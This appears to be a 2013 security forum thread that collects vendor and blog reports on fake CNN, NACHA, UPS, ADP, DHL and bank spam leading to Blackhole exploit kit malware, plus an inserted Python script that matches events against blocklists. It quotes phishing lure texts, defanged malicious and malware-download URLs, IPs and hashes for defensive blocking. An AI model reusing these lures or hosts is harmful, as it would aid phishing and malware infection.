Click the following to access the sent link:
Cyprus banks shut extended to Monday - CNN.com*
Get your EMAIL THIS Browser Button and use it to email content from any Web site. Click here for more information.
*This article can also be accessed if you copy and paste the entire address below into your web browser.
by clicking here
The malicious payload is at [donotclick]salespeoplerelaunch .org/close/printed_throwing-interpreting-dedicated.php (report here) hosted on 69.197.177.16 (WholeSale Internet, US).
Nameservers are NS1.DNSLVLUP.COM (5.9.212.43, Hetzner / Dolorem Ipsum Management Ltd, Germany) and NS2.DNSLVLUP.COM (66.85.131.123, Secured Servers LLC / Phoenix NAP, US)
Recommended blocklist:
salespeoplerelaunch .org
dnslvlup .com
69.197.177.16
5.9.212.43
66.85.131.123"
Scam of the day: More fake CNN e-mails
- https://isc.sans.edu/diary.html?storyid=15436
Last Updated: 2013-03-19 17:37:08 UTC
> https://isc.sans.edu/diaryimages/images/cnncyprus.png
> http://wepawet.iseclab.org/view.php?hash=dbeb07e4d46aa4cbd38617a925499c22&type=js
:mad:
AplusWebMaster
2013-03-20, 14:09
FYI...
Fake USPS SPAM / himalayaori .ru
- http://blog.dynamoo.com/2013/03/usps-spam-himalayaoriru.html
20 March 2013 - "This -fake- UPS (or is it USPS?) spam leads to malware on himalayaori .ru. The malicious link is in an attachment called ATT17235668.htm. For some reason the only sample of the spam that I have is horribly mangled:
From: HamzaRowson @hotmail .com [mailto:HamzaRowson @hotmail .com]
Sent: 19 March 2013 23:40
Subject: United Postal Service Tracking Number H1338091657
Your USPS TEAM for big savings!
Can't see images? CLICK HERE.
UPS UPS SUPPORT 56 Not Ready to Open an Account? The UPS Store® can help with full service packing and shipping.
Learn More >> UPS - Your UPS Team
Good day, [redacted].
Dear User , Delivery Confirmation: Failed
Track your Shipment now!
With best regards , Your UPS Customer Services. Shipping Tracking Calculate Time & Cost
Open an Account @ 2011 United Parcel Service of America, Inc. USPS Team, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
This is a marketing e-mail for UPS services. Click here to update your e-mail preferences or to unsubscribe to USPS .us Customer Services marketing e-mail For information on UPS's privacy practices, please refer to UPS Privacy Policy. Your USPS .US, 5 Glenlake Parkway, NE - Atlanta, GA 30325
Attn: Customer Communications Department
Clicking on the attachment sends the intended victim to a malicious web page at [donotclick]himalayaori .ru:8080/forum/links/column.php (report here*), in this case via a legitimate hacked site at [donotclick]www.unisgolf .ch/report.htm but that is less important. himalayaori .ru is hosted on a couple of IPs that look familiar:
50.22.0.2 (SoftLayer, US)
188.165.202.204 (OVH, France)
Recommended blocklist:
50.22.0.2
188.165.202.204
himalayaori .ru
hentaimusika .ru
hiskintako .ru
gxnaika .ru
forumla .ru
gulivaerinf .ru
foruminanki.ru
forumny .ru ..."
* http://urlquery.net/report.php?id=1525298
___
Fake Invoice SPAM / hifnsiiip .ru
- http://blog.dynamoo.com/2013/03/end-of-aug-statement-spam-hifnsiiipru.html
20 Mar 2013 - "This fake invoice spam leads to malware on hifnsiiip .ru:
Date: Wed, 20 Mar 2013 05:41:44 +0100
From: LinkedIn Connections [connections @linkedin .com]
Subject: Re: FW: End of Aug. Statement
Attachments: Invoices-AS9927.htm
Good morning,
as reqeusted I give you inovices issued to you per dec. 2012 ( Internet Explorer file)
Regards
The attached Invoices-AS9927.htm file attempts to direct the victim to a malicious landing page [donotclick]hifnsiiip .ru:8080/forum/links/column.php (report here*) hosted on:
50.22.0.2 (SoftLayer, US)
109.230.229.156 (High Quality Server, Germany)
188.165.202.204 (OVH, France)
Recommended blocklist:
50.22.0.2
109.230.229.156
188.165.202.204..."
(More at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1526708
... Detected suspicious URL pattern... Blackhole 2 Landing Page 188.165.202.204
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake FedEx Parcel Delivery Failure Notification E-mail Messages - 2013 Mar 20
Fake Electronic Payment Cancellation E-mail Messages - 2013 Mar 20
Fake Payment Transaction Notice E-mail Messages - 2013 Mar 19
Fake Wire Transfer Notification E-mail Messages - 2013 Mar 19
Fake Document Attachment E-mail Message - 2013 Mar 19
Fake CashPro Online Digital Certificate Notification E-mail Messages - 2013 Mar 18
Fake Order And Transfer Slip Notification E-mail Messages - 2013 Mar 18
Fake Payment Processing Notice E-mail Messages - 2013 Mar 18
Fake Purchase Order Payment Notification E-mail Messages - 2013 Mar 18
Fake Product Order E-mail Messages - 2013 Mar 18
Fake Online Purchase Receipt E-mail Messages - 2013 Mar 18
(More detail and links at the cisco URL above.)
:fear::mad:
AplusWebMaster
2013-03-21, 18:06
FYI...
Fake NACHA SPAM / encodeshole .org
- http://blog.dynamoo.com/2013/03/nacha-spam.html
21 March 2013 - "This fake NACHA spam leads to malware on encodeshole .org:
From: "Тимур.Родионов @direct.nacha .org" [mailto:biker @wmuttkecompany .com]
Sent: 20 March 2013 18:51
Subject: Payment ID 454806207096 rejected
Importance: High
Dear Sirs,
Herewith we are informing you, that your latest Direct Deposit payment (ID431989197078) was cancelled,due to your current Direct Deposit software being out of date. Please use the link below to enter the secure section of our web site and see the details::
Click here for more information
Please apply to your financial institution to get the necessary updates of the Direct Deposit software.
Best regards,
ACH Network Rules Department
NACHA - The Electronic Payments Association
10933 Sunrise Valley Drive, Suite 771
Herndon, VA 20190
Phone: 703-561-0849 Fax: 703-787-0548
The malicious payload is at [donotclick]encodeshole.org/closest/209tuj2dsljdglsgjwrigslgkjskga.php (report here) hosted on 91.234.33.187 (FOP Sedinkin Olexandr Valeriyovuch, Ukraine). The following suspect domains are on the same IP:
91.234.33.187
encodeshole .org
rotariesnotify .org
rigidembraces .info
storeboughtmodelers .info
* http://urlquery.net/report.php?id=1536940
... Detected BlackHole v2.0 exploit kit URL pattern... Detected live BlackHole v2.0 exploit kit 91.234.33.187
- https://www.google.com/safebrowsing/diagnostic?site=AS:56485
"... over the past 90 days, 54 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-03-21, and the last time suspicious content was found was on 2013-03-21... Over the past 90 days, we found 8 site(s) on this network... that appeared to function as intermediaries for the infection of 23 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 13 site(s)... that infected 30 other site(s)..."
___
Fake ScanJet SPAM / hillaryklinton .ru
- http://blog.dynamoo.com/2013/03/scan-from-hewlett-packard-scanjet-spam_21.html
21 March 2013 - "This fake printer spam leads to malware on the amusingly-named hillaryklinton .ru:
From: messages-noreply@bounce .linkedin .com [mailto:messages-noreply @bounce.linkedin .com] On Behalf Of LinkedIn Password
Sent: 21 March 2013 06:56
Subject: Scan from a Hewlett-Packard ScanJet #269644
Attached document was scanned and sent
to you using a Hewlett-Packard HP Officejet 6209P.
Sent by: SANDIE
Images : 1
Attachment Type: .HTM [INTERNET EXPLORER]
Hewlett-Packard Officejet Location: machine location not set
In this case there is an attachment called Scanned_Document.htm which leads to a malicious payload at [donotclick]hillaryklinton .ru:8080/forum/links/column.php (report here*) hosted on:
50.22.0.2 (SoftLayer, US)
62.75.157.196 (Inergenia, Germany)
109.230.229.156 (High Quality Server, Germany)
Blocklist:
50.22.0.2
62.75.157.196
109.230.229.156
foruminanki .ru
forumla .ru
forumny .ru
gulivaerinf .ru
gxnaika .ru
hanofk .ru
heelicotper .ru
hifnsiiip .ru
hillaryklinton .ru
himalayaori .ru
humalinaoo .ru
* http://urlquery.net/report.php?id=1535161
... Detected suspicious URL pattern... Blackhole 2 Landing Page 109.230.229.156
___
Fake CNN emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/03/21/fake-cnn-breaking-news-alerts-themed-emails-lead-to-black-hole-exploit-kit/?
March 21, 2013 - "... thousands of malicious ‘CNN Breaking News’ themed emails... exploit-serving and malware-dropping links found within. Once users click on any of the links found in the bogus emails, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/03/fake_email_spam_cnn_breaking_news_alerts_exploits_malware_social_engineering_black_hole_exploit_kit.png
... Malicious domain name reconnaissance:
webpageparking .net – 109.74.61.59; 24.111.157.113; 58.26.233.175; 155.239.247.247...
Responding to 24.111.157.113 ... malicious domains...
Upon successful client-side exploitation, the campaign drops MD5: 24d406ef41e9a4bc558e22bde0917cc5 * ... Worm:Win32/Cridex.E...
* https://www.virustotal.com/en/file/3e40e6903716e0a59a898242161c55c2ca100e539a665a8634e101346ce289be/analysis/
File name: deskadp.dll
Detection ratio: 23/45
Analysis date: 2013-03-21 10:46
___
Fake "Data Processing Service" spam / airtrantran .com
- http://blog.dynamoo.com/2013/03/data-processing-service-spam.html
21 Mar 2013 - "This spam leads to malware on airtrantran .com
Date: Thu, 21 Mar 2013 15:55:22 +0000 [11:55:22 EDT]
From: Data Processing Service [customerservice @dataprocessingservice .com]
Subject: ACH file ID "973.995" has been processed successfully
Files Processing Service
SUCCESS Notification
We have successfully complete ACH file 'ACH2013-03-20-8.txt' (id '973.995') submitted by user '[redacted]' on '2013-03-20 23:24:14.9'.
FILE SUMMARY:
Item count: 21
Total debits: $17,903.59
Total credits: $17,903.59
For addidional info review it here
24.111.157.113 (Midcontinent Media, US)
58.26.233.175 (TMnet, Malaysia)
109.74.61.59 (Ace Telecom, Hungary)
155.239.247.247 (Centurion Telkom, South Africa)
Blocklist:
24.111.157.113
58.26.233.175
109.74.61.59
155.239.247.247 ..."
___
Fake Facebook SPAM / scriptuserreported .org
- http://blog.dynamoo.com/2013/03/facebook-spam-scriptuserreportedorg.html
21 Mar 2013 - "This Facebook spam has undergone some sort of failure during construction, revealing some of the secrets of how these messages are constructed. It leads to malware on scriptuserreported .org:
Date: Thu, 21 Mar 2013 10:56:28 -0500
From: Facebook [update+oi=MKW63Z @facebookmail .com]
Subject: John Jenkins commented photo of you.
facebook
John Jenkins commented on {l5}.
reply to this email to comment on this photo.
see comment
this message was sent to {mailto_username}@{mailto_domain}. if you don't want to receive these emails from facebook in the future, please unsubscribe.
facebook, inc., attention: department 415, po box 1000{digit}, palo alto, ca 9{digit}3{digit}
The malicious payload is at [donotclick]scriptuserreported .org/close/keys-importance-mention.php hosted on 5.39.37.31 and there are no surprises that this is OVH in France.. but wait a minute because this is in a little suballocated block thusly:
inetnum: 5.39.37.24 - 5.39.37.31
netname: n2p3DoHost
descr: DoHost n2 p3
country: FR ...
Let's start with the server at 5.39.37.31 which is distributing the Blackhole Exploit Kit (report here*). This server also hosts the following potentially malicious domains:
pesteringpricelinecom .net
resolveconsolidate .net
scriptuserreported .org
provingmoa .com
Go back a few IPs to 5.39.37.28 and there are a couple of work-at-home scam sites:
workhomeheres01 .com
workhomeheres02 .com
There's also a work-at-home scam on 5.39.37.24:
makeworkhome12 .pl
5.39.37.26 appears to be hosting a control panel for the Neutrino Exploit kit:
myadminspanels .info
supermyadminspanels .info
So you can pretty much assume that 5.39.37.24/29 is a sewer and you should block the lot. Who is n2p3DoHost? Well, I don't know.. but there's one more clue at 5.39.37.29 which is the domain rl-host .net...
Does M. Queste own this /29? If he does, then it looks like he has some very bad customers..
Minimum blocklist:
5.39.37.31
pesteringpricelinecom .net
resolveconsolidate .net
scriptuserreported .org
provingmoa .com
Recommended blocklist:
5.39.37.24/29
makeworkhome12 .pl
myadminspanels .info
supermyadminspanels .info
workhomeheres01 .com
workhomeheres02 .com
rl-host .net
pesteringpricelinecom .net
resolveconsolidate.net
scriptuserreported .org
provingmoa .com"
* http://urlquery.net/report.php?id=1539128
... Detected live BlackHole v2.0 exploit kit 5.39.37.31
___
Fake Changelog SPAM / hillairusbomges .ru
- http://blog.dynamoo.com/2013/03/changelog-spam-hillairusbomgesru.html
21 Mar 2013 - "This fake changelog spam leads to malware on hillairusbomges .ru:
Date: Thu, 21 Mar 2013 03:01:59 -0500 [04:01:59 EDT]
From: LinkedIn Email Confirmation [emailconfirm @linkedin .com]
Subject: Re: Changelog Oct.
Good morning,
as prmised updated changelog - View
L. LOYD
The malicious payload is at [donotclick]hillairusbomges .ru:8080/forum/links/column.php (report here*) hosted on:
50.22.0.2 (Softlayer / Monday Sessions Media, US)
66.249.23.64 (Endurance International Group, US)
188.165.202.204 (OVH, France)
Blocklist:
50.22.0.2
66.249.23.64
188.165.202.204 ..."
* http://urlquery.net/report.php?id=1540852
... Detected suspicious URL pattern... Blackhole 2 Landing Page 188.165.202.204
:fear::mad:
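The dynamoo posts above hand out their indicators in a defanged form ("domain .ru", bare IPs, and in the scriptuserreported .org case a whole 5.39.37.24/29 block to be treated as one unit). The script below is an added example, not code from the forum or from dynamoo: it re-fangs a blocklist pasted in that form, turns single IPs and CIDR ranges into network objects, and matches constructed proxy/firewall events against it. The `dst=` log format and every event line are constructed for the example; the indicator lines are copied from the posts above.

```python
"""Normalise defanged IOC lists from the posts and match events against them.

Added example; the log format (key=value with a dst= field) is an assumption.
"""
import ipaddress
import re

# A subset of the blocklist lines quoted in the posts above, kept in the
# blog's defanged form: "domain .tld" spacing, bare IPs, one CIDR block,
# and the trailing "..." / closing quote the forum quotes carry.
RAW_BLOCKLIST = """
5.39.37.24/29
makeworkhome12 .pl
myadminspanels .info
scriptuserreported .org
50.22.0.2
66.249.23.64
188.165.202.204 ..."
hillairusbomges .ru
"""

# Constructed events, not real log data: a dst= field per line.
SAMPLE_EVENTS = [
    "2013-03-21T16:02:11Z src=10.0.0.5 dst=scriptuserreported.org proto=http",
    "2013-03-21T16:02:15Z src=10.0.0.5 dst=5.39.37.28 proto=tcp",
    "2013-03-21T16:03:40Z src=10.0.0.7 dst=www.example.com proto=http",
    "2013-03-21T16:04:02Z src=10.0.0.9 dst=hillairusbomges.ru proto=http",
    "2013-03-21T16:05:00Z src=10.0.0.9 dst=188.165.202.205 proto=tcp",
]


def parse_blocklist(text):
    """Return (networks, domains) from a defanged blocklist.

    Whitespace inside an entry is removed ("domain .ru" -> "domain.ru");
    anything ipaddress accepts becomes a network (a bare IP is a /32),
    everything else is treated as a domain.
    """
    nets, domains = [], set()
    for line in text.splitlines():
        line = line.strip().rstrip('."').strip()  # drop "..." and quote marks
        if not line:
            continue
        token = re.sub(r"\s+", "", line)
        try:
            nets.append(ipaddress.ip_network(token, strict=False))
        except ValueError:
            domains.add(token.lower())
    return nets, domains


def is_blocked_ip(ip, nets):
    """True if ip falls inside any listed network (raises ValueError if not an IP)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def is_blocked_host(host, domains):
    """True if host equals a listed domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def flag_events(events, nets, domains):
    """Return the dst values of events that hit the blocklist, in order."""
    hits = []
    for event in events:
        match = re.search(r"dst=(\S+)", event)
        if not match:
            continue
        dst = match.group(1)
        try:
            blocked = is_blocked_ip(dst, nets)
        except ValueError:  # not an IP literal, so compare as a hostname
            blocked = is_blocked_host(dst, domains)
        if blocked:
            hits.append(dst)
    return hits


if __name__ == "__main__":
    networks, domain_set = parse_blocklist(RAW_BLOCKLIST)
    for hit in flag_events(SAMPLE_EVENTS, networks, domain_set):
        print("blocked destination:", hit)
```

Note the difference between the two IP entries: 5.39.37.28 is flagged because the post recommends blocking the whole 5.39.37.24/29, while 188.165.202.205 is not, because only the single host 188.165.202.204 is listed.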
AplusWebMaster
2013-03-22, 18:13
FYI...
Fake Zendesk SPAM / vagh .ru / pillshighest .com
- http://blog.dynamoo.com/2013/03/zendesk-important-notice-about-security.html
22 Mar 2013 - "This unusual spam leads to a fake pharma site on pillshighest .com via vagh .ru and an intermediate -hacked- site.
Date: Fri, 22 Mar 2013 13:52:08 -0700
From: Support Team [pinbot @schwegler .com]
To: [redacted]
Subject: An important notice about security
We recently learned that the vendor we use to answer support requests and other emails (Zendesk) experienced a security breach.
We're sending you this email because we received or answered a message from you using Zendesk. Unfortunately your name, email address and subject line of your message were improperly accessed during their security breach. To help keep your account secure, please:
Don't share your password. We will never send you an email asking for your password. If you get an email like this, please let us know right away.
Beware of suspicious emails. If you get any emails that look like they're from our Support Team but don't feel right, please let us know - especially if they include details about your support request.
Use a strong password. If your password is weak, you can create a new one.
We're really sorry this happened, and we'll keep working with law enforcement and our vendors to ensure your information is protected.
Support Team
Questions? See our FAQ.
This email was sent to [redacted].
©2013 Zendesk, Inc. | All Rights Reserved
Privacy Policy | Terms and Conditions
There appears to be no malware involved in this attack. After the user has clicked through to the -hacked- site (in this case [donotclick]www.2001hockey .com/promo/page/ - report here*) the victim is -bounced- to [donotclick]vagh .ru on 193.105.210.212 (FOP Budko Dmutro Pavlovuch, Ukraine**) and then on to [donotclick]pillshighest .com on 91.217.53.30 (Fanjcom, Czech Republic).
Some IPs and domains you might want to block:
91.217.53.30
193.105.210.212 ..."
(More listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1547240
... RBN - Known Russian Business Network IP - 109.120.138.155***
** https://www.google.com/safebrowsing/diagnostic?site=AS:57954
*** https://www.google.com/safebrowsing/diagnostic?site=AS:30968
- http://nakedsecurity.sophos.com/2013/03/22/fake-zendesk-security-notice/
March 22, 2013
> https://sophosnews.files.wordpress.com/2013/03/fake-security-notice.jpg?w=640
___
Fake ACH email - malware...
- http://www.hoax-slayer.com/ach-file-processed-malware.shtml
March 22, 2013 - "Outline: Message purporting to be from the Automated Clearing House (ACH) claims that a file submitted by a user has been successfully processed and invites recipients to click a link to read more information about the large sum transactions listed....
Brief Analysis: The email is -not- from ACH and the transactions listed in the message are not genuine. The -link- in the email opens a compromised website that harbours information-stealing malware... Those who do click the link will be taken to one of several websites that harbour malware. Once downloaded, such malware can typically make connections with remote servers controlled by criminals, download and install further malware components and harvest personal and financial information from the infected computer.
Scammers have targeted the ACH and the entity's managing body NACHA for several years. Some have been malware attacks such as this one. Others have been phishing scams intent on tricking people into divulging their personal and financial information. The ACH is an official funds transfer system that processes large volumes of credit and debit transactions in the United States and this makes it an attractive target for scammers.
Neither ACH nor NACHA will ever send you an unsolicited email that asks you to open an attachment or follow a link and supply personal information. If you receive an email that claims to be from the ACH or NACHA, do not open any attachments that it may contain. Do not follow any links in the email. Do not reply to the email or supply any information to the senders."
___
Fake Wire Transfer SPAM / dataprocessingservice-alerts .com
- http://blog.dynamoo.com/2013/03/wire-transfer-spam-dataprocessingservic.html
22 Mar 2013 - "This fake Wire Transfer spam leads to malware on dataprocessingservice-alerts .com:
Date: Fri, 22 Mar 2013 10:42:22 -0600
From: support @digitalinsight .com
Subject: Terminated Wire Transfer Notification - Ref: 54133
Immediate Transfers Processing Service
STATUS Notification
The following wire transfer has been submitted for approval. Please visit this link to review the transaction details (ref '54133' submitted by user '[redacted]' ).
TRANSACTION SUMMARY:
Initiated By: [redacted]
Initiated Date & Time: 2013-03-21 4:00:46 PM PST
Reference Number: 54133
For addidional info visit this link
The payload is at [donotclick]dataprocessingservice-alerts .com/kill/chosen_wishs_refuses-limits.php (report here*) hosted on:
24.111.157.113 (Midcontinent Media, US)
58.26.233.175 (TMNet, Malaysia)
155.239.247.247 (Centurion Telkom, South Africa)
Blocklist:
24.111.157.113
58.26.233.175
155.239.247.247 ..."
* http://urlquery.net/report.php?id=1548528
... Detected live BlackHole v2.0 exploit kit 24.111.157.113
___
Fake Changelog SPAM / hohohomaza .ru
- http://blog.dynamoo.com/2013/03/changelog-spam-hohohomazaru.html
22 Mar 2013 - "Evil changelog spam episode 274, leading to malware on hohohomaza .ru. Hohoho indeed.
Date: Fri, 22 Mar 2013 11:06:48 -0430
From: Hank Sears via LinkedIn [member @linkedin .com]
Subject: Fwd: Changelog as promised (upd.)
Hello,
as promised changelog - View
L. HENDRICKS
The malware landing page is at [donotclick]hohohomaza .ru:8080/forum/links/column.php hosted on:
50.22.0.2 (Softlayer / Monday Sessions Media, US)
66.249.23.64 (Endurance International Group, US)
80.246.62.143 (Alfahosting / Host Europe, Germany)
Blocklist:
50.22.0.2
66.249.23.64
80.246.62.143 ..."
:mad::fear:
AplusWebMaster
2013-03-25, 19:14
FYI...
Fake BBC emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/03/25/malicious-bbc-daily-email-cyprus-bailout-themed-emails-lead-to-black-hole-exploit-kit/
March 25, 2013 - "Cybercriminals are currently spamvertising tens of thousands of malicious emails impersonating BBC News, in an attempt to trick users into thinking that someone has shared a Cyprus bailout themed news item with them. Once users click on any of the links found in the fake emails, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the fake BBC News email:
> https://webrootblog.files.wordpress.com/2013/03/fake_malicious_bbc_news_email_malware_exploits_spam_black_hole_exploit_kit_cyprus.png
... Sample client-side exploits serving URL: hxxp ://crackedserverz .com/kill/larger_emergency.php – 155.239.247.247; 109.74.61.59; 24.111.157.113; 58.26.233.175 – Email: tellecomvideo1 @gmx .us...
Upon successful client-side exploitation the campaign drops MD5: 1d4aaaf4ae7bfdb0d9936cd71ea717b2 * ...Spyware/Win32.Zbot..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/4603f908de8080fc6e5d33738225a3f4c2ae609a958819be16e782ad469f38c7/analysis/
File name: 1d4aaaf4ae7bfdb0d9936cd71ea717b2
Detection ratio: 23/45
Analysis date: 2013-03-21
- https://www.net-security.org/malware_news.php?id=2444
25.03.2013
Fake: https://www.net-security.org/images/articles/bbc-cyprus-fake-big.jpg
___
Fake Bank of America SPAM / PAYMENT RECEIPT 25-03-2013-GBK-74
- http://blog.dynamoo.com/2013/03/bank-of-america-spam-payment-receipt-25.html
25 Mar 2013 - "This spam comes with a malicious EXE file in the archive PAYMENT RECEIPT 25-03-2013-GBK-74.zip
Date: Mon, 25 Mar 2013 05:50:18 +0300 [03/24/13 22:50:18 EDT]
From: Bank of America [gaudilyl30 @gmail .com]
Subject: Your transaction is completed
Transaction is completed. $4924 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Payment receipt is attached.
*** This is an automatically generated email, please do not reply ***
Bank of America, N.A. Member FDIC. Equal Housing Lender Opens in new window
© 2013 Bank of America Corporation. All rights reserved
Opening the ZIP file leads to an EXE called PAYMENT RECEIPT 25-03-2013-GBK-74.EXE which has a pretty patchy detection rate on VirusTotal*. Comodo CAMAS detects traffic to the domains seantit .ru and programcam .ru hosted on:
59.99.226.54 (BSNL Internet, India)
66.248.200.143 (Avante Hosting Services / Dominic Lambie, US)
77.241.198.65 (VPSnet, Lithuania)
81.20.146.229 (GONetwork, Estonia)
103.14.8.20 (Symphony Communication, Thailand)
Plain list:
59.99.226.54
66.248.200.143
77.241.198.65
81.20.146.229
103.14.8.20 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en/file/b1cd9d3eedfbca41fc97421574eb5824d47fe4e74e4742ef4f00cd5007ad755d/analysis/
File name: Loaf Harley Goals
Detection ratio: 22/46
Analysis date: 2013-03-25
___
Fake HP ScanJet SPAM / humaniopa .ru
- http://blog.dynamoo.com/2013/03/scan-from-hp-scanjet-spam-humanioparu.html
25 Mar 2013 - "This fake printer spam leads to malware on humaniopa .ru:
Date: Mon, 25 Mar 2013 03:57:54 -0500
From: LinkedIn Connections [connections @linkedin .com]
Subject: Scan from a HP ScanJet #928909620
Attachments: Scanned_Document.htm
Attached document was scanned and sent
to you using a Hewlett-Packard HP Officejet 98278P.
Sent by: CHANG
Images : 5
Attachment Type: .HTM [INTERNET EXPLORER]
Hewlett-Packard Officejet Location: machine location not set
The attachment Scanned_Document.htm leads to malware on [donotclick]humaniopa .ru:8080/forum/links/column.php (report here*) hosted on:
66.249.23.64 (Endurance International Group, US)
72.11.155.182 (OC3 Networks, US)
72.167.254.194 (GoDaddy, US)
95.211.154.196 (Leaseweb, Netherlands)
Blocklist:
66.249.23.64
72.11.155.182
72.167.254.194
95.211.154.196 ..."
* http://urlquery.net/report.php?id=1592330
... Detected suspicious URL pattern... Blackhole 2 Landing Page 95.211.154.196
___
Fake "Copies of policies" SPAM / heepsteronst .ru
- http://blog.dynamoo.com/2013/03/copies-of-policies-spam-heepsteronstru.html
25 Mar 2013 - "This spam leads to malware on heepsteronst .ru:
Date: Mon, 25 Mar 2013 06:20:54 -0500 [07:20:54 EDT]
From: Ashley Madison [donotreply @ashleymadison .com]
Subject: RE: DEBBRA - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
DEBBRA Barnard,
The malicious payload is at [donotclick]heepsteronst .ru:8080/forum/links/column.php (report here*). The IP addresses used are the same ones as used in this attack**."
* http://urlquery.net/report.php?id=1593558
... Detected suspicious URL pattern... Blackhole 2 Landing Page 72.167.254.194
** http://blog.dynamoo.com/2013/03/scan-from-hp-scanjet-spam-humanioparu.html
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Future of Digital Marketing Event Notification E-mail Message - 2013 Mar 25
Fake Product Order Shipping Documents E-mail Messages - 2013 Mar 25
Fake Online Dating Request E-mail Messages - 2013 Mar 25
Fake Product Sample Request E-mail Messages - 2013 Mar 25
Fake Product Order E-mail Message - 2013 Mar 25
Fake Quotation Request With Attached Sample Design Notification E-mail Messages - 2013 Mar 25
Fake Shipment Notification E-mail Messages - 2013 Mar 25
Fake Bank Repayment Information E-mail Messages - 2013 Mar 25
Fake Payment Transaction Notification E-mail Messages - 2013 Mar 25
(More detail and links at the cisco URL above.)
:mad::mad:
AplusWebMaster
2013-03-26, 13:49
FYI...
Fake ADP emails lead to malware
- http://blog.webroot.com/2013/03/26/adp-payroll-invoice-themed-emails-lead-to-malware/
March 26, 2013 - "Over the past week, we intercepted a massive ‘ADP Payroll Invoice’ themed malicious spam campaign, enticing users into executing a malicious file attachment. Once users execute the sample, it downloads additional pieces of malware on the affected host, compromising the integrity, and violating the confidentiality of the affected PC...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/03/email_spam_adp_payroll_invoice_malware_social_engineering_malicious_software_downloader_botnet.png
Detection rate for the malicious attachment:
MD5: 54e9a0495fbd5c952af7507d15ebab90 * ... Trojan.Win32.FakeAV.qqdm
... Initiating the following TCP connections:
213.186.47.54 :8080
195.93.201.42 :80
216.55.186.239 :80
77.92.151.6 :80
66.118.64.208 :80 ...
Detection rates for the downloaded malware samples:
hxxp://infoshore.biz/cx5oMi.exe – MD5: 13eeca375585322c676812cf9e2e9789 ** ... Heuristic.LooksLike.Win32.Suspicious.B
hxxp://axelditter.de/w91qZ5.exe – MD5: 87c658970958bb5794354a91f8cc5a7d – detected by 18 out of 46 antivirus scanners as PWS:Win32/Zbot.gen!AM...
It then attempts multiple UDP connection attempts to the following IPs part of the botnet’s infrastructure:
..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/f7988dfeb5a7cd947604074d7f5f648ecc6ffe7bff38bca71f08779f69150298/analysis/1363949422/
File name: ADP_Invoice.exe
Detection ratio: 24/46
Analysis date: 2013-03-22
** https://www.virustotal.com/en/file/8710ba76461b3627deb85aac0b0c1729c0ce58af1d77806fa1bfa3eae3de7268/analysis/1363952056/
File name: ADP_cx5oMi.exe
Detection ratio: 3/46
Analysis date: 2013-03-22
___
Fake NACHA SPAM / breathtakingundistinguished .biz
- http://blog.dynamoo.com/2013/03/nacha-spam-breathtakingundistinguishedb.html
26 March 2013 - "This fake NACHA spam leads to malware on breathtakingundistinguished .biz:
From: "Гена.Симонов@direct .nacha .org" [mailto:corruptnessljx953 @bsilogistik .com]
Sent: 25 March 2013 22:26
Subject: Re: Your Direct Deposit disallowance
Importance: High
Attn: Accounting Department
We are sorry to notify you, that your latest Direct Deposit transaction (#963417979218) was disallowed,because your business software package was out of date. The detailed information about this matter is available in the secure section of our web site:
Click here for more information
Please consult with your financial institution to acquire the updated version of the software.
Yours truly,
ACH Network Rules Department
NACHA - The Electronic Payments Association
19681 Sunrise Valley Drive, Suite 275
Herndon, VA 20135
Phone: 703-561-1796 Fax: 703-787-1698
The malicious payload is at [donotclick]breathtakingundistinguished .biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php (report here*) hosted on 62.173.138.71 (Internet-Cosmos Ltd., Russia). The following malicious sites are also hosted on the same server:
necessarytimealtering .biz
hitwiseintelligence .biz
breathtakingundistinguished .biz "
* http://urlquery.net/report.php?id=1615815
... Detected BlackHole v2.0 exploit kit URL pattern... Detected live BlackHole v2.0 exploit kit 62.173.138.71
___
Fake DHL Spam / LABEL-ID-NY26032013-GFK73.zip
- http://blog.dynamoo.com/2013/03/dhl-spam-label-id-ny26032013-gfk73zip.html
26 Mar 2013 - "This DHL-themed spam contains a malicious attachment.
Date: Tue, 26 Mar 2013 17:27:46 +0700 [06:27:46 EDT]
From: Bart Whitt - DHL regional manager [reports @dhl .com]
Subject: DHL delivery report NY20032013-GFK73
Web Version | Update preferences | Unsubscribe
DHL notification
Our company’s courier couldn’t make the delivery of parcel.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: New York
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: ETBAKPRSU3
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
If the parcel isn’t received within 15 working days our company will have the right to claim compensation from you for it’s keeping in the amount of $8.26 for each day of keeping of it.
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
DHL Global
Edit your subscription | Unsubscribe
> https://lh3.ggpht.com/-7RU-0iFN_k8/UVGDBXTvZ4I/AAAAAAAABCo/gtvsmzUfMCk/s1600/dhl.png
Attached is a ZIP file called LABEL-ID-NY26032013-GFK73.zip which in turn contains LABEL-ID-NY26032013-GFK73.EXE (note that the date is encoded into the filename, so subsequent versions will change).
VirusTotal detections for this malware are low (7/46*). The malware resists analysis from common tools, so I don't have any deeper insight as to what is going on.
Update: Comodo CAMAS identified some of the phone-home domains which are the same as the ones used here**."
